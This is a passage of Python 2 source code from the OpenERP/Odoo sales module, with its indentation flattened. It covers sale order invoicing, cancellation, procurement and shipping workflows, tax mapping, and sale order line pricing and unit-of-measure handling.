'team_id' : order.team_id.id
}
# Care for deprecated _inv_get() hook - FIXME: to be removed after 6.1
invoice_vals.update(self._inv_get(cr, uid, order, context=context))
return invoice_vals
def _make_invoice(self, cr, uid, order, lines, context=None):
inv_obj = self.pool.get('account.invoice')
obj_invoice_line = self.pool.get('account.invoice.line')
if context is None:
context = {}
invoiced_sale_line_ids = self.pool.get('sale.order.line').search(cr, uid, [('order_id', '=', order.id), ('invoiced', '=', True)], context=context)
from_line_invoice_ids = []
for invoiced_sale_line_id in self.pool.get('sale.order.line').browse(cr, uid, invoiced_sale_line_ids, context=context):
for invoice_line_id in invoiced_sale_line_id.invoice_lines:
if invoice_line_id.invoice_id.id not in from_line_invoice_ids:
from_line_invoice_ids.append(invoice_line_id.invoice_id.id)
for preinv in order.invoice_ids:
if preinv.state not in ('cancel',) and preinv.id not in from_line_invoice_ids:
for preline in preinv.invoice_line:
inv_line_id = obj_invoice_line.copy(cr, uid, preline.id, {'invoice_id': False, 'price_unit': -preline.price_unit})
lines.append(inv_line_id)
inv = self._prepare_invoice(cr, uid, order, lines, context=context)
inv_id = inv_obj.create(cr, uid, inv, context=context)
data = inv_obj.onchange_payment_term_date_invoice(cr, uid, [inv_id], inv['payment_term'], time.strftime(DEFAULT_SERVER_DATE_FORMAT))
if data.get('value', False):
inv_obj.write(cr, uid, [inv_id], data['value'], context=context)
inv_obj.button_compute(cr, uid, [inv_id])
return inv_id
def print_quotation(self, cr, uid, ids, context=None):
'''
This function prints the sales order and mark it as sent, so that we can see more easily the next step of the workflow
'''
assert len(ids) == 1, 'This option should only be used for a single id at a time'
self.signal_workflow(cr, uid, ids, 'quotation_sent')
return self.pool['report'].get_action(cr, uid, ids, 'sale.report_saleorder', context=context)
def manual_invoice(self, cr, uid, ids, context=None):
""" create invoices for the given sales orders (ids), and open the form
view of one of the newly created invoices
"""
mod_obj = self.pool.get('ir.model.data')
# create invoices through the sales orders' workflow
inv_ids0 = set(inv.id for sale in self.browse(cr, uid, ids, context) for inv in sale.invoice_ids)
self.signal_workflow(cr, uid, ids, 'manual_invoice')
inv_ids1 = set(inv.id for sale in self.browse(cr, uid, ids, context) for inv in sale.invoice_ids)
# determine newly created invoices
new_inv_ids = list(inv_ids1 - inv_ids0)
res = mod_obj.get_object_reference(cr, uid, 'account', 'invoice_form')
res_id = res and res[1] or False,
return {
'name': _('Customer Invoices'),
'view_type': 'form',
'view_mode': 'form',
'view_id': [res_id],
'res_model': 'account.invoice',
'context': "{'type':'out_invoice'}",
'type': 'ir.actions.act_window',
'nodestroy': True,
'target': 'current',
'res_id': new_inv_ids and new_inv_ids[0] or False,
}
def action_view_invoice(self, cr, uid, ids, context=None):
'''
This function returns an action that display existing invoices of given sales order ids. It can either be a in a list or in a form view, if there is only one invoice to show.
'''
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
result = mod_obj.get_object_reference(cr, uid, 'account', 'action_invoice_tree1')
id = result and result[1] or False
result = act_obj.read(cr, uid, [id], context=context)[0]
#compute the number of invoices to display
inv_ids = []
for so in self.browse(cr, uid, ids, context=context):
inv_ids += [invoice.id for invoice in so.invoice_ids]
#choose the view_mode accordingly
if len(inv_ids)>1:
result['domain'] = "[('id','in',["+','.join(map(str, inv_ids))+"])]"
else:
res = mod_obj.get_object_reference(cr, uid, 'account', 'invoice_form')
result['views'] = [(res and res[1] or False, 'form')]
result['res_id'] = inv_ids and inv_ids[0] or False
return result
def test_no_product(self, cr, uid, order, context):
for line in order.order_line:
if line.product_id and (line.product_id.type<>'service'):
return False
return True
def action_invoice_create(self, cr, uid, ids, grouped=False, states=None, date_invoice = False, context=None):
if states is None:
states = ['confirmed', 'done', 'exception']
res = False
invoices = {}
invoice_ids = []
invoice = self.pool.get('account.invoice')
obj_sale_order_line = self.pool.get('sale.order.line')
partner_currency = {}
# If date was specified, use it as date invoiced, usefull when invoices are generated this month and put the
# last day of the last month as invoice date
if date_invoice:
context = dict(context or {}, date_invoice=date_invoice)
for o in self.browse(cr, uid, ids, context=context):
currency_id = o.pricelist_id.currency_id.id
if (o.partner_id.id in partner_currency) and (partner_currency[o.partner_id.id] <> currency_id):
raise osv.except_osv(
_('Error!'),
_('You cannot group sales having different currencies for the same partner.'))
partner_currency[o.partner_id.id] = currency_id
lines = []
for line in o.order_line:
if line.invoiced:
continue
elif (line.state in states):
lines.append(line.id)
created_lines = obj_sale_order_line.invoice_line_create(cr, uid, lines)
if created_lines:
invoices.setdefault(o.partner_invoice_id.id or o.partner_id.id, []).append((o, created_lines))
if not invoices:
for o in self.browse(cr, uid, ids, context=context):
for i in o.invoice_ids:
if i.state == 'draft':
return i.id
for val in invoices.values():
if grouped:
res = self._make_invoice(cr, uid, val[0][0], reduce(lambda x, y: x + y, [l for o, l in val], []), context=context)
invoice_ref = ''
origin_ref = ''
for o, l in val:
invoice_ref += (o.client_order_ref or o.name) + '|'
origin_ref += (o.origin or o.name) + '|'
self.write(cr, uid, [o.id], {'state': 'progress'})
cr.execute('insert into sale_order_invoice_rel (order_id,invoice_id) values (%s,%s)', (o.id, res))
self.invalidate_cache(cr, uid, ['invoice_ids'], [o.id], context=context)
#remove last '|' in invoice_ref
if len(invoice_ref) >= 1:
invoice_ref = invoice_ref[:-1]
if len(origin_ref) >= 1:
origin_ref = origin_ref[:-1]
invoice.write(cr, uid, [res], {'origin': origin_ref, 'name': invoice_ref})
else:
for order, il in val:
res = self._make_invoice(cr, uid, order, il, context=context)
invoice_ids.append(res)
self.write(cr, uid, [order.id], {'state': 'progress'})
cr.execute('insert into sale_order_invoice_rel (order_id,invoice_id) values (%s,%s)', (order.id, res))
self.invalidate_cache(cr, uid, ['invoice_ids'], [order.id], context=context)
return res
def action_invoice_cancel(self, cr, uid, ids, context=None):
self.write(cr, uid, ids, {'state': 'invoice_except'}, context=context)
return True
def action_invoice_end(self, cr, uid, ids, context=None):
for this in self.browse(cr, uid, ids, context=context):
for line in this.order_line:
if line.state == 'exception':
line.write({'state': 'confirmed'})
if this.state == 'invoice_except':
this.write({'state': 'progress'})
return True
def action_cancel(self, cr, uid, ids, context=None):
if context is None:
context = {}
sale_order_line_obj = self.pool.get('sale.order.line')
account_invoice_obj = self.pool.get('account.invoice')
for sale in self.browse(cr, uid, ids, context=context):
for inv in sale.invoice_ids:
if inv.state not in ('draft', 'cancel'):
raise osv.except_osv(
_('Cannot cancel this sales order!'),
_('First cancel all invoices attached to this sales order.'))
inv.signal_workflow('invoice_cancel')
sale_order_line_obj.write(cr, uid, [l.id for l in sale.order_line],
{'state': 'cancel'})
self.write(cr, uid, ids, {'state': 'cancel'})
return True
def action_button_confirm(self, cr, uid, ids, context=None):
assert len(ids) == 1, 'This option should only be used for a single id at a time.'
self.signal_workflow(cr, uid, ids, 'order_confirm')
return True
def action_wait(self, cr, uid, ids, context=None):
context = context or {}
for o in self.browse(cr, uid, ids):
if not o.order_line:
raise osv.except_osv(_('Error!'),_('You cannot confirm a sales order which has no line.'))
noprod = self.test_no_product(cr, uid, o, context)
if (o.order_policy == 'manual') or noprod:
self.write(cr, uid, [o.id], {'state': 'manual', 'date_confirm': fields.date.context_today(self, cr, uid, context=context)})
else:
self.write(cr, uid, [o.id], {'state': 'progress', 'date_confirm': fields.date.context_today(self, cr, uid, context=context)})
self.pool.get('sale.order.line').button_confirm(cr, uid, [x.id for x in o.order_line])
return True
def action_quotation_send(self, cr, uid, ids, context=None):
'''
This function opens a window to compose an email, with the edi sale template message loaded by default
'''
assert len(ids) == 1, 'This option should only be used for a single id at a time.'
ir_model_data = self.pool.get('ir.model.data')
try:
template_id = ir_model_data.get_object_reference(cr, uid, 'sale', 'email_template_edi_sale')[1]
except ValueError:
template_id = False
try:
compose_form_id = ir_model_data.get_object_reference(cr, uid, 'mail', 'email_compose_message_wizard_form')[1]
except ValueError:
compose_form_id = False
ctx = dict()
ctx.update({
'default_model': 'sale.order',
'default_res_id': ids[0],
'default_use_template': bool(template_id),
'default_template_id': template_id,
'default_composition_mode': 'comment',
'mark_so_as_sent': True
})
return {
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'mail.compose.message',
'views': [(compose_form_id, 'form')],
'view_id': compose_form_id,
'target': 'new',
'context': ctx,
}
def action_done(self, cr, uid, ids, context=None):
for order in self.browse(cr, uid, ids, context=context):
self.pool.get('sale.order.line').write(cr, uid, [line.id for line in order.order_line], {'state': 'done'}, context=context)
return self.write(cr, uid, ids, {'state': 'done'}, context=context)
def _prepare_order_line_procurement(self, cr, uid, order, line, group_id=False, context=None):
date_planned = self._get_date_planned(cr, uid, order, line, order.date_order, context=context)
return {
'name': line.name,
'origin': order.name,
'date_planned': date_planned,
'product_id': line.product_id.id,
'product_qty': line.product_uom_qty,
'product_uom': line.product_uom.id,
'product_uos_qty': (line.product_uos and line.product_uos_qty) or line.product_uom_qty,
'product_uos': (line.product_uos and line.product_uos.id) or line.product_uom.id,
'company_id': order.company_id.id,
'group_id': group_id,
'invoice_state': (order.order_policy == 'picking') and '2binvoiced' or 'none',
'sale_line_id': line.id
}
def _get_date_planned(self, cr, uid, order, line, start_date, context=None):
date_planned = datetime.strptime(start_date, DEFAULT_SERVER_DATETIME_FORMAT) + timedelta(days=line.delay or 0.0)
return date_planned
def _prepare_procurement_group(self, cr, uid, order, context=None):
return {'name': order.name, 'partner_id': order.partner_shipping_id.id}
def procurement_needed(self, cr, uid, ids, context=None):
#when sale is installed only, there is no need to create procurements, that's only
#further installed modules (sale_service, sale_stock) that will change this.
sale_line_obj = self.pool.get('sale.order.line')
res = []
for order in self.browse(cr, uid, ids, context=context):
res.append(sale_line_obj.need_procurement(cr, uid, [line.id for line in order.order_line], context=context))
return any(res)
def action_ignore_delivery_exception(self, cr, uid, ids, context=None):
for sale_order in self.browse(cr, uid, ids, context=context):
self.write(cr, uid, ids, {'state': 'progress' if sale_order.invoice_exists else 'manual'}, context=context)
return True
def action_ship_create(self, cr, uid, ids, context=None):
"""Create the required procurements to supply sales order lines, also connecting
the procurements to appropriate stock moves in order to bring the goods to the
sales order's requested location.
:return: True
"""
procurement_obj = self.pool.get('procurement.order')
sale_line_obj = self.pool.get('sale.order.line')
for order in self.browse(cr, uid, ids, context=context):
proc_ids = []
vals = self._prepare_procurement_group(cr, uid, order, context=context)
if not order.procurement_group_id:
group_id = self.pool.get("procurement.group").create(cr, uid, vals, context=context)
order.write({'procurement_group_id': group_id})
for line in order.order_line:
#Try to fix exception procurement (possible when after a shipping exception the user choose to recreate)
if line.procurement_ids:
#first check them to see if they are in exception or not (one of the related moves is cancelled)
procurement_obj.check(cr, uid, [x.id for x in line.procurement_ids if x.state not in ['cancel', 'done']])
line.refresh()
#run again procurement that are in exception in order to trigger another move
proc_ids += [x.id for x in line.procurement_ids if x.state in ('exception', 'cancel')]
procurement_obj.reset_to_confirmed(cr, uid, proc_ids, context=context)
elif sale_line_obj.need_procurement(cr, uid, [line.id], context=context):
if (line.state == 'done') or not line.product_id:
continue
vals = self._prepare_order_line_procurement(cr, uid, order, line, group_id=order.procurement_group_id.id, context=context)
proc_id = procurement_obj.create(cr, uid, vals, context=context)
proc_ids.append(proc_id)
#Confirm procurement order such that rules will be applied on it
#note that the workflow normally ensure proc_ids isn't an empty list
procurement_obj.run(cr, uid, proc_ids, context=context)
#if shipping was in exception and the user choose to recreate the delivery order, write the new status of SO
if order.state == 'shipping_except':
val = {'state': 'progress', 'shipped': False}
if (order.order_policy == 'manual'):
for line in order.order_line:
if (not line.invoiced) and (line.state not in ('cancel', 'draft')):
val['state'] = 'manual'
break
order.write(val)
return True
def onchange_fiscal_position(self, cr, uid, ids, fiscal_position, order_lines, context=None):
'''Update taxes of order lines for each line where a product is defined
:param list ids: not used
:param int fiscal_position: sale order fiscal position
:param list order_lines: command list for one2many write method
'''
order_line = []
fiscal_obj = self.pool.get('account.fiscal.position')
product_obj = self.pool.get('product.product')
line_obj = self.pool.get('sale.order.line')
fpos = False
if fiscal_position:
fpos = fiscal_obj.browse(cr, uid, fiscal_position, context=context)
for line in order_lines:
# create (0, 0, { fields })
# update (1, ID, { fields })
if line[0] in [0, 1]:
prod = None
if line[2].get('product_id'):
prod = product_obj.browse(cr, uid, line[2]['product_id'], context=context)
elif line[1]:
prod = line_obj.browse(cr, uid, line[1], context=context).product_id
if prod and prod.taxes_id:
line[2]['tax_id'] = [[6, 0, fiscal_obj.map_tax(cr, uid, fpos, prod.taxes_id)]]
order_line.append(line)
# link (4, ID)
# link all (6, 0, IDS)
elif line[0] in [4, 6]:
line_ids = line[0] == 4 and [line[1]] or line[2]
for line_id in line_ids:
prod = line_obj.browse(cr, uid, line_id, context=context).product_id
if prod and prod.taxes_id:
order_line.append([1, line_id, {'tax_id': [[6, 0, fiscal_obj.map_tax(cr, uid, fpos, prod.taxes_id)]]}])
else:
order_line.append([4, line_id])
else:
order_line.append(line)
return {'value': {'order_line': order_line}}
def test_procurements_done(self, cr, uid, ids, context=None):
for sale in self.browse(cr, uid, ids, context=context):
for line in sale.order_line:
if not all([x.state == 'done' for x in line.procurement_ids]):
return False
return True
def test_procurements_except(self, cr, uid, ids, context=None):
for sale in self.browse(cr, uid, ids, context=context):
for line in sale.order_line:
if any([x.state == 'cancel' for x in line.procurement_ids]):
return True
return False
# TODO add a field price_unit_uos
# - update it on change product and unit price
# - use it in report if there is a uos
class sale_order_line(osv.osv):
def need_procurement(self, cr, uid, ids, context=None):
#when sale is installed only, there is no need to create procurements, that's only
#further installed modules (sale_service, sale_stock) that will change this.
prod_obj = self.pool.get('product.product')
for line in self.browse(cr, uid, ids, context=context):
if prod_obj.need_procurement(cr, uid, [line.product_id.id], context=context):
return True
return False
def _amount_line(self, cr, uid, ids, field_name, arg, context=None):
tax_obj = self.pool.get('account.tax')
cur_obj = self.pool.get('res.currency')
res = {}
if context is None:
context = {}
for line in self.browse(cr, uid, ids, context=context):
price = line.price_unit * (1 - (line.discount or 0.0) / 100.0)
taxes = tax_obj.compute_all(cr, uid, line.tax_id, price, line.product_uom_qty, line.product_id, line.order_id.partner_id)
cur = line.order_id.pricelist_id.currency_id
res[line.id] = cur_obj.round(cr, uid, cur, taxes['total'])
return res
def _get_uom_id(self, cr, uid, *args):
try:
proxy = self.pool.get('ir.model.data')
result = proxy.get_object_reference(cr, uid, 'product', 'product_uom_unit')
return result[1]
except Exception, ex:
return False
def _fnct_line_invoiced(self, cr, uid, ids, field_name, args, context=None):
res = dict.fromkeys(ids, False)
for this in self.browse(cr, uid, ids, context=context):
res[this.id] = this.invoice_lines and \
all(iline.invoice_id.state != 'cancel' for iline in this.invoice_lines)
return res
def _order_lines_from_invoice(self, cr, uid, ids, context=None):
# direct access to the m2m table is the less convoluted way to achieve this (and is ok ACL-wise)
cr.execute("""SELECT DISTINCT sol.id FROM sale_order_invoice_rel rel JOIN
sale_order_line sol ON (sol.order_id = rel.order_id)
WHERE rel.invoice_id = ANY(%s)""", (list(ids),))
return [i[0] for i in cr.fetchall()]
def _get_price_reduce(self, cr, uid, ids, field_name, arg, context=None):
res = dict.fromkeys(ids, 0.0)
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = line.price_subtotal / line.product_uom_qty
return res
_name = 'sale.order.line'
_description = 'Sales Order Line'
_columns = {
'order_id': fields.many2one('sale.order', 'Order Reference', required=True, ondelete='cascade', select=True, readonly=True, states={'draft':[('readonly',False)]}),
'name': fields.text('Description', required=True, readonly=True, states={'draft': [('readonly', False)]}),
'sequence': fields.integer('Sequence', help="Gives the sequence order when displaying a list of sales order lines."),
'product_id': fields.many2one('product.product', 'Product', domain=[('sale_ok', '=', True)], change_default=True, readonly=True, states={'draft': [('readonly', False)]}, ondelete='restrict'),
'invoice_lines': fields.many2many('account.invoice.line', 'sale_order_line_invoice_rel', 'order_line_id', 'invoice_id', 'Invoice Lines', readonly=True, copy=False),
'invoiced': fields.function(_fnct_line_invoiced, string='Invoiced', type='boolean',
store={
'account.invoice': (_order_lines_from_invoice, ['state'], 10),
'sale.order.line': (lambda self,cr,uid,ids,ctx=None: ids, ['invoice_lines'], 10)
}),
'price_unit': fields.float('Unit Price', required=True, digits_compute= dp.get_precision('Product Price'), readonly=True, states={'draft': [('readonly', False)]}),
'price_subtotal': fields.function(_amount_line, string='Subtotal', digits_compute= dp.get_precision('Account')),
'price_reduce': fields.function(_get_price_reduce, type='float', string='Price Reduce', digits_compute=dp.get_precision('Product Price')),
'tax_id': fields.many2many('account.tax', 'sale_order_tax', 'order_line_id', 'tax_id', 'Taxes', readonly=True, states={'draft': [('readonly', False)]}),
'address_allotment_id': fields.many2one('res.partner', 'Allotment Partner',help="A partner to whom the particular product needs to be allotted."),
'product_uom_qty': fields.float('Quantity', digits_compute= dp.get_precision('Product UoS'), required=True, readonly=True, states={'draft': [('readonly', False)]}),
'product_uom': fields.many2one('product.uom', 'Unit of Measure ', required=True, readonly=True, states={'draft': [('readonly', False)]}),
'product_uos_qty': fields.float('Quantity (UoS)' ,digits_compute= dp.get_precision('Product UoS'), readonly=True, states={'draft': [('readonly', False)]}),
'product_uos': fields.many2one('product.uom', 'Product UoS'),
'discount': fields.float('Discount (%)', digits_compute= dp.get_precision('Discount'), readonly=True, states={'draft': [('readonly', False)]}),
'th_weight': fields.float('Weight', readonly=True, states={'draft': [('readonly', False)]}),
'state': fields.selection(
[('cancel', 'Cancelled'),('draft', 'Draft'),('confirmed', 'Confirmed'),('exception', 'Exception'),('done', 'Done')],
'Status', required=True, readonly=True, copy=False,
help='* The \'Draft\' status is set when the related sales order in draft status. \
\n* The \'Confirmed\' status is set when the related sales order is confirmed. \
\n* The \'Exception\' status is set when the related sales order is set as exception. \
\n* The \'Done\' status is set when the sales order line has been picked. \
\n* The \'Cancelled\' status is set when a user cancel the sales order related.'),
'order_partner_id': fields.related('order_id', 'partner_id', type='many2one', relation='res.partner', store=True, string='Customer'),
'salesman_id':fields.related('order_id', 'user_id', type='many2one', relation='res.users', store=True, string='Salesperson'),
'company_id': fields.related('order_id', 'company_id', type='many2one', relation='res.company', string='Company', store=True, readonly=True),
'delay': fields.float('Delivery Lead Time', required=True, help="Number of days between the order confirmation and the shipping of the products to the customer", readonly=True, states={'draft': [('readonly', False)]}),
'procurement_ids': fields.one2many('procurement.order', 'sale_line_id', 'Procurements'),
}
_order = 'order_id desc, sequence, id'
_defaults = {
'product_uom' : _get_uom_id,
'discount': 0.0,
'product_uom_qty': 1,
'product_uos_qty': 1,
'sequence': 10,
'state': 'draft',
'price_unit': 0.0,
'delay': 0.0,
}
def _get_line_qty(self, cr, uid, line, context=None):
if line.product_uos:
return line.product_uos_qty or 0.0
return line.product_uom_qty
def _get_line_uom(self, cr, uid, line, context=None):
if line.product_uos:
return line.product_uos.id
return line.product_uom.id
def _prepare_order_line_invoice_line(self, cr, uid, line, account_id=False, context=None):
"""Prepare the dict of values to create the new invoice line for a
sales order line. This method may be overridden to implement custom
invoice generation (making sure to call super() to establish
a clean extension chain).
:param browse_record line: sale.order.line record to invoice
:param int account_id: optional ID of a G/L account to force
(this is used for returning products including service)
:return: dict of values to create() the invoice line
"""
res = {}
if not line.invoiced:
if not account_id:
if line.product_id:
account_id = line.product_id.property_account_income.id
if not account_id:
account_id = line.product_id.categ_id.property_account_income_categ.id
if not account_id:
raise osv.except_osv(_('Error!'),
_('Please define income account for this product: "%s" (id:%d).') % \
(line.product_id.name, line.product_id.id,))
else:
prop = self.pool.get('ir.property').get(cr, uid,
'property_account_income_categ', 'product.category',
context=context)
account_id = prop and prop.id or False
uosqty = self._get_line_qty(cr, uid, line, context=context)
uos_id = self._get_line_uom(cr, uid, line, context=context)
pu = 0.0
if uosqty:
pu = round(line.price_unit * line.product_uom_qty / uosqty,
self.pool.get('decimal.precision').precision_get(cr, uid, 'Product Price'))
fpos = line.order_id.fiscal_position or False
account_id = self.pool.get('account.fiscal.position').map_account(cr, uid, fpos, account_id)
if not account_id:
raise osv.except_osv(_('Error!'),
_('There is no Fiscal Position defined or Income category account defined for default properties of Product categories.'))
res = {
'name': line.name,
'sequence': line.sequence,
'origin': line.order_id.name,
'account_id': account_id,
'price_unit': pu,
'quantity': uosqty,
'discount': line.discount,
'uos_id': uos_id,
'product_id': line.product_id.id or False,
'invoice_line_tax_id': [(6, 0, [x.id for x in line.tax_id])],
'account_analytic_id': line.order_id.project_id and line.order_id.project_id.id or False,
}
return res
def invoice_line_create(self, cr, uid, ids, context=None):
if context is None:
context = {}
create_ids = []
sales = set()
for line in self.browse(cr, uid, ids, context=context):
vals = self._prepare_order_line_invoice_line(cr, uid, line, False, context)
if vals:
inv_id = self.pool.get('account.invoice.line').create(cr, uid, vals, context=context)
self.write(cr, uid, [line.id], {'invoice_lines': [(4, inv_id)]}, context=context)
sales.add(line.order_id.id)
create_ids.append(inv_id)
# Trigger workflow events
for sale_id in sales:
workflow.trg_write(uid, 'sale.order', sale_id, cr)
return create_ids
def button_cancel(self, cr, uid, ids, context=None):
for line in self.browse(cr, uid, ids, context=context):
if line.invoiced:
raise osv.except_osv(_('Invalid Action!'), _('You cannot cancel a sales order line that has already been invoiced.'))
return self.write(cr, uid, ids, {'state': 'cancel'})
def button_confirm(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'confirmed'})
def button_done(self, cr, uid, ids, context=None):
res = self.write(cr, uid, ids, {'state': 'done'})
for line in self.browse(cr, uid, ids, context=context):
workflow.trg_write(uid, 'sale.order', line.order_id.id, cr)
return res
def uos_change(self, cr, uid, ids, product_uos, product_uos_qty=0, product_id=None):
product_obj = self.pool.get('product.product')
if not product_id:
return {'value': {'product_uom': product_uos,
'product_uom_qty': product_uos_qty}, 'domain': {}}
product = product_obj.browse(cr, uid, product_id)
value = {
'product_uom': product.uom_id.id,
}
# FIXME must depend on uos/uom of the product and not only of the coeff.
try:
value.update({
'product_uom_qty': product_uos_qty / product.uos_coeff,
'th_weight': product_uos_qty / product.uos_coeff * product.weight
})
except ZeroDivisionError:
pass
return {'value': value}
def create(self, cr, uid, values, context=None):
if values.get('order_id') and values.get('product_id') and any(f not in values for f in ['name', 'price_unit', 'type', 'product_uom_qty', 'product_uom']):
order = self.pool['sale.order'].read(cr, uid, values['order_id'], ['pricelist_id', 'partner_id', 'date_order', 'fiscal_position'], context=context)
defaults = self.product_id_change(cr, uid, [], order['pricelist_id'][0], values['product_id'],
qty=float(values.get('product_uom_qty', False)),
uom=values.get('product_uom', False),
qty_uos=float(values.get('product_uos_qty', False)),
uos=values.get('product_uos', False),
name=values.get('name', False),
partner_id=order['partner_id'][0],
date_order=order['date_order'],
fiscal_position=order['fiscal_position'][0] if order['fiscal_position'] else False,
flag=False, # Force name update
context=context
)['value']
if defaults.get('tax_id'):
defaults['tax_id'] = [[6, 0, defaults['tax_id']]]
values = dict(defaults, **values)
return super(sale_order_line, self).create(cr, uid, values, context=context)
def product_id_change(self, cr, uid, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, packaging=False, fiscal_position=False, flag=False, context=None):
if context is None:
context = {}
Partner = self.pool['res.partner']
ProductUom = self.pool['product.uom']
Product = self.pool['product.product']
ctx_product = dict(context)
partner = False
if partner_id:
partner = Partner.browse(cr, uid, partner_id, context=context)
ctx_product['lang'] = partner.lang
ctx_product['partner_id'] = partner_id
elif lang:
ctx_product['lang'] = lang
if not product:
return {'value': {'th_weight': 0,
'product_uos_qty': qty}, 'domain': {'product_uom': [],
'product_uos': []}}
if not date_order:
date_order = time.strftime(DEFAULT_SERVER_DATE_FORMAT)
result = {}
product_obj = Product.browse(cr, uid, product, context=ctx_product)
uom2 = False
if uom:
uom2 = ProductUom.browse(cr, uid, uom, context=context)
if product_obj.uom_id.category_id.id != uom2.category_id.id:
uom = False
if uos:
if product_obj.uos_id:
uos2 = ProductUom.browse(cr, uid, uos, context=context)
if product_obj.uos_id.category_id.id != uos2.category_id.id:
uos = False
else:
uos = False
fpos = False
if not fiscal_position:
fpos = partner and partner.property_account_position or False
else:
fpos = self.pool['account.fiscal.position'].browse(cr, uid, fiscal_position)
if update_tax: # The quantity only have changed
result['tax_id'] = self.pool['account.fiscal.position'].map_tax(cr, uid, fpos, product_obj.taxes_id)
if not flag:
result['name'] = Product.name_get(cr, uid, [product_obj.id], context=ctx_product)[0][1]
if product_obj.description_sale:
result['name'] += '\n'+product_obj.description_sale
domain = {}
if (not uom) and (not uos):
result['product_uom'] = product_obj.uom_id.id
if product_obj.uos_id:
result['product_uos'] = product_obj.uos_id.id
result['product_uos_qty'] = qty * product_obj.uos_coeff
uos_category_id = product_obj.uos_id.category_id.id
else:
result['product_uos'] = False
result['product_uos_qty'] = qty
uos_category_id = False
result['th_weight'] = qty * product_obj.weight
domain = {'product_uom':
[('category_id', '=', product_obj.uom_id.category_id.id)],
'product_uos':
[('category_id', '=', uos_category_id)]}
elif uos and not uom: # only happens if uom is False
result['product_uom'] = product_obj.uom_id and product_obj.uom_id.id
result['product_uom_qty'] = qty_uos / product_obj.uos_coeff
result['th_weight'] = result['product_uom_qty'] * product_obj.weight
elif uom: # whether uos is set or not
default_uom = product_obj.uom_id and product_obj.uom_id.id
q = ProductUom._compute_qty(cr, uid, uom, qty, default_uom)
if product_obj.uos_id:
result['product_uos'] = product_obj.uos_id.id
result['product_uos_qty'] = qty * product_obj.uos_coeff
else:
result['product_uos'] = False
result['product_uos_qty'] = qty
result['th_weight'] = q * product_obj.weight # Round the quantity up
if not uom2:
uom2 = product_obj.uom_id
if pricelist and partner_id:
price = self.pool['product.pricelist'].price_get(cr, uid, [pricelist],
product, qty or 1.0, partner_id, {
'uom': uom or result.get('product_uom'),
'date': date_order,
})[pricelist]
else:
price = Product.price_get(cr, uid, [product], ptype='list_price', context=ctx_product)[product] or False
result.update({'price_unit': price})
return {'value': result, 'domain': domain}
def product_uom_change(self, cursor, user, ids, pricelist, product, qty=0,
uom=False, qty_uos=0, uos=False, name='', partner_id=False,
lang=False, update_tax=True, date_order=False, context=None):
context = context or {}
lang = lang or ('lang' in context and context['lang'])
if not uom:
return {'value': {'price_unit': 0.0, 'product_uom' : uom or False}}
return self.product_id_change(cursor, user, ids, pricelist, product,
qty=qty, uom=uom, qty_uos=qty_uos, uos=uos, name=name,
partner_id=partner_id, lang=lang, update_tax=update_tax,
date_order=date_order, context=context)
def unlink(self, cr, uid, ids, context=None):
if context is None:
context = {}
"""Allows to delete sales order lines in draft,cancel states"""
for rec in self.browse(cr, uid, ids, context=context):
if rec.state not in ['draft', 'cancel']:
raise osv.except_osv(_('Invalid Action!'), _('Cannot delete a sales order line which is in state \'%s\'.') %(rec.state,))
return super(sale_order_line, self).unlink(cr, uid, ids, context=context)
class mail_compose_message(osv.Model):
_inherit = 'mail.compose.message'
def send_mail(self, cr, uid, ids, context=None):
context = context or {}
if context.get('default_model') == 'sale.order' and context.get('default_res_id') and context.get('mark_so_as_sent'):
context = dict(context, mail_post_autofollow=True)
self.pool.get('sale.order').signal_workflow(cr, uid, [context['default_res_id']], 'quotation_sent')
return super(mail_compose_message, self).send_mail(cr, uid, ids, context=context)
class account_invoice(osv.Model):
_inherit = 'account.invoice'
def _get_default_team_id(self, cr, uid, context=None):
""" Gives default team by checking if present in the context """
team_id = self._resolve_team_id_from_context(cr, uid, context=context) or False
return team_id
def _resolve_team_id_from_context(self, cr, uid, context=None):
""" Returns ID of team based on the value of 'team_id'
context key, or None if it cannot be resolved to a single
Sales Team.
"""
if context is None:
context = {}
if type(context.get('default_team_id')) in (int, long):
return context.get('default_team_id')
if isinstance(context.get('default_team_id'), basestring):
team_ids = self.pool.get('crm.team').name_search(cr, uid, name=context['default_team_id'], context=context)
if len(team_ids) == 1:
return int(team_ids[0][0])
return None
_columns = {
'team_id': fields.many2one('crm.team', 'Sales Team', oldname='section_id'),
}
_defaults = {
'team_id': lambda self, cr, uid, c=None: self._get_default_team_id(cr, uid, context=c)
}
def confirm_paid(self, cr, uid, ids, context=None):
sale_order_obj = self.pool.get('sale.order')
res = super(account_invoice, self).confirm_paid(cr, uid, ids, context=context)
so_ids = sale_order_obj.search(cr, uid, [('invoice_ids', 'in', ids)], context=context)
for so_id in so_ids:
sale_order_obj.message_post(cr, uid, so_id, body=_("Invoice paid"), context=context)
return res
def unlink(self, cr, uid, ids, context=None):
""" Overwrite unlink method of account invoice to send a trigger to the sale workflow upon invoice deletion """
invoice_ids = self.search(cr, uid, [('id', 'in', ids), ('state', 'in', ['draft', 'cancel'])], context=context)
#if we can't cancel all invoices, do nothing
if len(invoice_ids) == len(ids):
#Cancel invoice(s) first before deleting them so that if any sale order is associated with them
#it will trigger the workflow to put the sale order in an 'invoice exception' state
for id in ids:
workflow.trg_validate(uid, 'account.invoice', id, 'invoice_cancel', cr)
return super(account_invoice, self).unlink(cr, uid, ids, context=context)
class procurement_order(osv.osv):
_inherit = 'procurement.order'
_columns = {
'sale_line_id': fields.many2one('sale.order.line', string='Sale Order Line'),
}
def write(self, cr, uid, ids, vals, context=None):
if isinstance(ids, (int, long)):
ids = [ids]
res = super(procurement_order, self).write(cr, uid, ids, vals, context=context)
from openerp import workflow
if vals.get('state') in ['done', 'cancel', 'exception']:
for proc in self.browse(cr, uid, ids, context=context):
if proc.sale_line_id and proc.sale_line_id.order_id:
order_id = proc.sale_line_id.order_id.id
if self.pool.get('sale.order').test_procurements_done(cr, uid, [order_id], context=context):
workflow.trg_validate(uid, 'sale.order', order_id, 'ship_end', cr)
if self.pool.get('sale.order').test_procurements_except(cr, uid, [order_id], context=context):
workflow.trg_validate(uid, 'sale.order', order_id, 'ship_except', cr)
return res
class product_product(osv.Model):
_inherit = 'product.product'
def _sales_count(self, cr, uid, ids, field_name, arg, context=None):
